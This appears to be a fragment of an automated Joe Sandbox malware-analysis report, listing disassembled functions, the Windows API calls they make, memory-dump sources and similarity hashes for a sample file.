                                                    • Part of subcall function 00007FF6CA9DEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA63
                                                    • Part of subcall function 00007FF6CA9DEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA6E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                  • String ID:
                                                  • API String ID: 502429940-0
                                                  • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                  • Instruction ID: f08d07593bc4b65dd901cf1f741c03d288bacc324e2f949dfae71ddad872c961
                                                  • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                  • Instruction Fuzzy Hash: 0A014032A25A81D2E648DF21F56426DB330FB88BC1F004071DB9E83625CF39E5B5C744
                                                  Function 00007FF6CA9EB014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadBitmapW.USER32 ref: 00007FF6CA9EB02A
                                                  • GetObjectW.GDI32 ref: 00007FF6CA9EB05B
                                                    • Part of subcall function 00007FF6CA9E8624: FindResourceExW.KERNELBASE ref: 00007FF6CA9E863D
                                                    • Part of subcall function 00007FF6CA9E8624: SizeofResource.KERNEL32 ref: 00007FF6CA9E8659
                                                    • Part of subcall function 00007FF6CA9E8624: LoadResource.KERNEL32 ref: 00007FF6CA9E8673
                                                    • Part of subcall function 00007FF6CA9E8624: LockResource.KERNEL32 ref: 00007FF6CA9E8685
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalAlloc.KERNELBASE ref: 00007FF6CA9E86A6
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalLock.KERNEL32 ref: 00007FF6CA9E86BB
                                                    • Part of subcall function 00007FF6CA9E8624: CreateStreamOnHGlobal.COMBASE ref: 00007FF6CA9E86E8
                                                    • Part of subcall function 00007FF6CA9E8624: GdipAlloc.GDIPLUS ref: 00007FF6CA9E86FE
                                                    • Part of subcall function 00007FF6CA9E8624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6CA9E8769
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalUnlock.KERNEL32 ref: 00007FF6CA9E878C
                                                    • Part of subcall function 00007FF6CA9E8624: GlobalFree.KERNEL32 ref: 00007FF6CA9E8795
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Global$Resource$AllocBitmapCreateGdipLoadLock$FindFreeFromObjectSizeofStreamUnlock
                                                  • String ID: ]
                                                  • API String ID: 2565863721-3352871620
                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                  • Instruction ID: ea1512accd5d5f3faa3ded2938d639b60532e2048e362c2a4307fa66862fb589
                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                  • Instruction Fuzzy Hash: 1611DA20B1D24241FA609F62B22A37852D1BF89BC2F0880B4D98DC7BCBDE3CF8158640
                                                  Function 00007FF6CA9DEAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Thread$CreatePriority
                                                  • String ID: CreateThread failed
                                                  • API String ID: 2610526550-3849766595
                                                  • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                  • Instruction ID: 3eaa073f73f40c6256fcbd37ed9b1562580f8ef55cd18de98fb1ed65eb9adf89
                                                  • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                  • Instruction Fuzzy Hash: AD118E31A18A4281EB10DF52F8621697370FB8479AF444272DACE83629DF3CE992C740
                                                  Function 00007FF6CA9E946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DirectoryInitializeMallocSystem
                                                  • String ID: riched20.dll
                                                  • API String ID: 174490985-3360196438
                                                  • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                  • Instruction ID: 6b83d0aa6fc6d3086cfb08b27101b50c828e56f16fc6589ad958888a87a3adf2
                                                  • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                  • Instruction Fuzzy Hash: 95F0AF71A18A8182EB508F60F4692AAB7A0FB88715F400235E9CE82B54DF7CD59ACB00
                                                  Function 00007FF6CA9E095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9E853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6CA9E856C
                                                    • Part of subcall function 00007FF6CA9DAAE0: LoadStringW.USER32 ref: 00007FF6CA9DAB67
                                                    • Part of subcall function 00007FF6CA9DAAE0: LoadStringW.USER32 ref: 00007FF6CA9DAB80
                                                    • Part of subcall function 00007FF6CA9C1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9C1FFB
                                                    • Part of subcall function 00007FF6CA9C129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CA9C1396
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9F01BB
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9F01C1
                                                  • SendDlgItemMessageW.USER32 ref: 00007FF6CA9F01F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                  • String ID:
                                                  • API String ID: 3106221260-0
                                                  • Opcode ID: 43920736de74aa4da65e0fd4567270d3e1c3be4e272a2fb0abf35ae58a38e895
                                                  • Instruction ID: 198f3d3ef7d5705e416b0028d1c3ee4163e799bac941011b8c6d5214c86bf95f
                                                  • Opcode Fuzzy Hash: 43920736de74aa4da65e0fd4567270d3e1c3be4e272a2fb0abf35ae58a38e895
                                                  • Instruction Fuzzy Hash: 3051C472F256414AFB109FA5E8662FD2322AB85B89F400275EE8DD77D7EE2CD541C340
                                                  Function 00007FF6CA9D2134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2272807158-0
                                                  • Opcode ID: 4633aabe45209f1f9dd1ffe7955cd7619df91bc49ec48e97e2d646cf6da4e046
                                                  • Instruction ID: 1ea780944408f4abc2f6b15ba3b4c27b39aa4b887aeca3e987d01b4da38aa0d2
                                                  • Opcode Fuzzy Hash: 4633aabe45209f1f9dd1ffe7955cd7619df91bc49ec48e97e2d646cf6da4e046
                                                  • Instruction Fuzzy Hash: 6641AF72A2878182EA148F15F46526963A1FB84BA5F105374EBED87AD6CF3CE491C601
                                                  Function 00007FF6CA9C23F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2176759853-0
                                                  • Opcode ID: 99f260cf01eacc222b7a5352e24814868a0cac877fcbd5e2c3ba6216c957fae9
                                                  • Instruction ID: 84d23cbf0928a6f238dc2f310112a8e40a066f0663b1f7f751344535fe87d0ef
                                                  • Opcode Fuzzy Hash: 99f260cf01eacc222b7a5352e24814868a0cac877fcbd5e2c3ba6216c957fae9
                                                  • Instruction Fuzzy Hash: 9D21C272A28B8181EA109F65B85117AB360FB89BD1F144235EFDD83B95CF3CD191C700
                                                  Function 00007FF6CA9E1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: std::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 1875163511-0
                                                  • Opcode ID: 65d8091f10f06cce83768fe095ce433e052fa83f4fe25a8c85fad3cbd40ccd0d
                                                  • Instruction ID: fbe9b1ea263cd01f539cb75483dc3db4041ab50cd611f62fb9db87c0f746a1cd
                                                  • Opcode Fuzzy Hash: 65d8091f10f06cce83768fe095ce433e052fa83f4fe25a8c85fad3cbd40ccd0d
                                                  • Instruction Fuzzy Hash: 6331F712A2868691FB249F14F4653B9A3B0FB50786F544471E2CCC66EBDF7CE546C342
                                                  Function 00007FF6CA9D3D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1203560049-0
                                                  • Opcode ID: 3b5c7dfba4016e6e243c7c3b7e225e8d3a84efcc83b0b2c8433822de01f77114
                                                  • Instruction ID: 1a729629152e0d3c34fc7c257407d63f9c8ac83b20a4eff4ef99fb3abc460ef3
                                                  • Opcode Fuzzy Hash: 3b5c7dfba4016e6e243c7c3b7e225e8d3a84efcc83b0b2c8433822de01f77114
                                                  • Instruction Fuzzy Hash: 1721FD22A18A8181EA208F25F46626A7360FFC8796F004270EEDEC76D5DF3CD581CA00
                                                  Function 00007FF6CA9D31BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3118131910-0
                                                  • Opcode ID: efdceb5f5ffab25265e5fdcae37b3fa604f3c5543451d082f18575ff986ab35b
                                                  • Instruction ID: 7cb199cf307aa670d06a459d829521c399371173cb2d2b6cba685d16870f0695
                                                  • Opcode Fuzzy Hash: efdceb5f5ffab25265e5fdcae37b3fa604f3c5543451d082f18575ff986ab35b
                                                  • Instruction Fuzzy Hash: 9F217962E2878181EA108F25F45626E7360FF88B96F501274EBDEC7695DF3CD581C740
                                                  Function 00007FF6CA9D32BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1203560049-0
                                                  • Opcode ID: 4ae5ded5c3556da1f0d03c02a2ab6d15854b36abb35067c68a226e6d7cfb6ad4
                                                  • Instruction ID: 098db75918da1599c33f49b4a5804d07b744f38266036092f8daa76430a821ef
                                                  • Opcode Fuzzy Hash: 4ae5ded5c3556da1f0d03c02a2ab6d15854b36abb35067c68a226e6d7cfb6ad4
                                                  • Instruction Fuzzy Hash: D121A762A2878181EA108F28F45512AB361FB887A6F501271EADDC37D5DF3CD481C704
                                                  Function 00007FF6CA9CF578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CF895
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CF89B
                                                    • Part of subcall function 00007FF6CA9D3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                  • String ID:
                                                  • API String ID: 3587649625-0
                                                  • Opcode ID: 523cfcae4ce27e4da1045e17439fd3e37f9321daedba48ff7041e95377e0fec7
                                                  • Instruction ID: 7cc7a04f8d046d688ad94ec702ada9ee94c8bfeac483f615c2b6a004db750117
                                                  • Opcode Fuzzy Hash: 523cfcae4ce27e4da1045e17439fd3e37f9321daedba48ff7041e95377e0fec7
                                                  • Instruction Fuzzy Hash: D091D333A28B8190EB10EF24E4552AD6361FB84799F904175EA8EC7AEADF7CD585C300
                                                  Function 00007FF6CA9C3904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: b7d18fcdb9ce11e94f0f8a2afa8545fe9f5a6d7038082b9b3b6f763717e9c5a1
                                                  • Instruction ID: a782cfa191a95f2bea0a03be2cdb51b4c8d467984235c022a0e015bbae4199ce
                                                  • Opcode Fuzzy Hash: b7d18fcdb9ce11e94f0f8a2afa8545fe9f5a6d7038082b9b3b6f763717e9c5a1
                                                  • Instruction Fuzzy Hash: BF41A462F24A5185FB00EEB5E4622AD7360AF44BD9F141175EE9DE7ADBDE38D4828300
                                                  Function 00007FF6CA9D2778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6CA9D274D), ref: 00007FF6CA9D28A9
                                                  • GetLastError.KERNEL32(?,00007FF6CA9D274D), ref: 00007FF6CA9D28B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                  • Instruction ID: 738d3228eacabaa54de0bf9d5345f5e3ded36f90d06602a302fb842b9481c64a
                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                  • Instruction Fuzzy Hash: AD31D832F2969282EE644F2AF9516752350AF04BD6F140171DE9DEB791DE3CE4C2C741
                                                  Function 00007FF6CA9C22BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                  • String ID:
